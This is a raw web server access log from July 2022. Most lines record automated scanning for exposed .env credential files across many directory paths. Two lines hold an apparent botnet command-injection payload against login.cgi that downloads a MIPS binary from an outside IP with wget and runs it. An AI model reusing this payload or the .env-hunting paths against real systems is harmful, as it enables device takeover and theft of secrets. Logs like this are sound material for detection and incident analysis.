20.231.218.149 - - [01/Jul/2022:22:10:15 +0200] "GET //route/.env.example HTTP/1.1" 404 323 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:10:16 +0200] "GET //src/.env.example HTTP/1.1" 404 321 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [01/Jul/2022:22:10:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
20.231.218.149 - - [01/Jul/2022:22:10:21 +0200] "GET //stag/.env.example HTTP/1.1" 404 322 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:10:23 +0200] "GET //staging/.env.example HTTP/1.1" 404 325 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:10:24 +0200] "GET //static/.env.example HTTP/1.1" 404 324 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:10:27 +0200] "GET //stats/.env.example HTTP/1.1" 404 323 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:10:31 +0200] "GET //storage/.env.example HTTP/1.1" 404 325 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:10:32 +0200] "GET //system/.env.example HTTP/1.1" 404 324 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:10:36 +0200] "GET //temp/.env.example HTTP/1.1" 404 322 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:10:39 +0200] "GET //test/.env.example HTTP/1.1" 404 322 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:10:43 +0200] "GET //tests/.env.example HTTP/1.1" 404 323 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:10:44 +0200] "GET //thumb/.env.example HTTP/1.1" 404 323 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
45.148.10.81 - - [01/Jul/2022:22:10:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
20.231.218.149 - - [01/Jul/2022:22:10:53 +0200] "GET //thumbs/.env.example HTTP/1.1" 404 324 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:10:54 +0200] "GET //tmp/.env.example HTTP/1.1" 404 321 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:10:59 +0200] "GET //vendor/.env.example HTTP/1.1" 404 324 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:11:00 +0200] "GET //vendor/laravel/.env.example HTTP/1.1" 404 332 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:11:06 +0200] "GET //web/.env.example HTTP/1.1" 404 321 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:11:09 +0200] "GET //.env_bak HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:11:11 +0200] "GET //.env.suspected HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:11:13 +0200] "GET //.env.1 HTTP/1.1" 404 311 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:11:14 +0200] "GET //.env~ HTTP/1.1" 404 310 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:11:15 +0200] "GET //.env.example.1 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [01/Jul/2022:22:11:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
20.231.218.149 - - [01/Jul/2022:22:11:18 +0200] "GET //.env.example.suspected HTTP/1.1" 404 327 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:11:19 +0200] "GET //core/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:11:21 +0200] "GET //config/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:11:23 +0200] "GET //app/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:11:24 +0200] "GET //web/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:11:28 +0200] "GET //public/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:11:30 +0200] "GET //en/.env HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:11:33 +0200] "GET //laravel/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:11:35 +0200] "GET //api/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:11:36 +0200] "GET //app/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:11:37 +0200] "GET //app/frontend/.env HTTP/1.1" 404 322 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:11:39 +0200] "GET //application/.env HTTP/1.1" 404 321 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:11:40 +0200] "GET //awstats/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:11:41 +0200] "GET //back-end/app/.env HTTP/1.1" 404 322 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:11:43 +0200] "GET //backend/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:11:45 +0200] "GET //backup/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:11:58 +0200] "GET //bootstrap/.env HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:11:59 +0200] "GET //build/.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:12:02 +0200] "GET //core/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:12:10 +0200] "GET //data/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:12:16 +0200] "GET //database/.env HTTP/1.1" 404 318 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:12:17 +0200] "GET //demo/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [01/Jul/2022:22:12:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
20.231.218.149 - - [01/Jul/2022:22:12:21 +0200] "GET //dev/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:12:23 +0200] "GET //developer/.env HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:12:28 +0200] "GET //django_project_path/.env HTTP/1.1" 404 329 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:12:32 +0200] "GET //docker/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:12:35 +0200] "GET //docs/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:12:45 +0200] "GET //en/.env HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:12:51 +0200] "GET //env/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:12:53 +0200] "GET //environments/.env HTTP/1.1" 404 322 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:12:54 +0200] "GET //example/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:12:59 +0200] "GET //examples/.env HTTP/1.1" 404 318 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:13:01 +0200] "GET //front-app/.env HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:13:05 +0200] "GET //front-empathy/.env HTTP/1.1" 404 323 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:13:08 +0200] "GET //front-end/.env HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:13:09 +0200] "GET //front/.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:13:13 +0200] "GET //frontend/.env HTTP/1.1" 404 318 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:13:14 +0200] "GET //js/.env HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:13:16 +0200] "GET //local/.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:13:17 +0200] "GET //log/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [01/Jul/2022:22:13:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
20.231.218.149 - - [01/Jul/2022:22:13:19 +0200] "GET //mail/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:13:21 +0200] "GET //prod/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:13:24 +0200] "GET //production/.env HTTP/1.1" 404 320 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:13:27 +0200] "GET //pub/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:13:28 +0200] "GET //public/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:13:30 +0200] "GET //rest/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:13:32 +0200] "GET //route/.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
61.180.245.145 - - [01/Jul/2022:22:13:34 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
20.231.218.149 - - [01/Jul/2022:22:13:35 +0200] "GET //src/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:13:36 +0200] "GET //stag/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:13:38 +0200] "GET //staging/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:13:40 +0200] "GET //staging2/.env HTTP/1.1" 404 318 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:13:43 +0200] "GET //static/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:13:46 +0200] "GET //stats/.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:13:47 +0200] "GET //storage/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:13:52 +0200] "GET //system/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:14:02 +0200] "GET //temp/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:14:03 +0200] "GET //test/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:14:06 +0200] "GET //tests/.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:14:07 +0200] "GET //tmp/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:14:10 +0200] "GET //vendor/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:14:13 +0200] "GET //vendor/laravel/.env HTTP/1.1" 404 324 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:14:14 +0200] "GET //web/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [01/Jul/2022:22:14:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
20.231.218.149 - - [01/Jul/2022:22:14:24 +0200] "GET //v1/.env HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:14:25 +0200] "GET //v2/.env HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:14:27 +0200] "GET //v1/.env.example HTTP/1.1" 404 320 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:14:29 +0200] "GET //v2/.env.example HTTP/1.1" 404 320 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:14:32 +0200] "GET //staging2/.env HTTP/1.1" 404 318 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:14:34 +0200] "GET //staging2/.env.example HTTP/1.1" 404 326 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:14:36 +0200] "GET //project/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.231.218.149 - - [01/Jul/2022:22:14:38 +0200] "GET //project/.env.example HTTP/1.1" 404 325 "-" "Mozilla/5.0 (X11 Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
31.220.1.83 - - [01/Jul/2022:22:14:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
31.220.1.83 - - [01/Jul/2022:22:14:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
45.148.10.81 - - [01/Jul/2022:22:14:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
2.57.122.98 - - [01/Jul/2022:22:14:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Jul/2022:22:15:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
31.220.1.83 - - [01/Jul/2022:22:15:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
31.220.1.83 - - [01/Jul/2022:22:16:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
31.220.1.83 - - [01/Jul/2022:22:16:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [01/Jul/2022:22:16:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
31.220.1.83 - - [01/Jul/2022:22:16:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [01/Jul/2022:22:17:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
31.220.1.83 - - [01/Jul/2022:22:17:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
45.148.10.81 - - [01/Jul/2022:22:17:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
212.91.246.72 - - [01/Jul/2022:22:18:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
31.220.1.83 - - [01/Jul/2022:22:18:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
31.220.1.83 - - [01/Jul/2022:22:18:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
31.220.1.83 - - [01/Jul/2022:22:19:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [01/Jul/2022:22:19:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
172.116.188.230 - - [01/Jul/2022:22:19:41 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
45.148.10.81 - - [01/Jul/2022:22:20:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
212.91.246.72 - - [01/Jul/2022:22:20:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:22:21:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:22:22:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.148.10.81 - - [01/Jul/2022:22:23:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
212.91.246.72 - - [01/Jul/2022:22:23:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
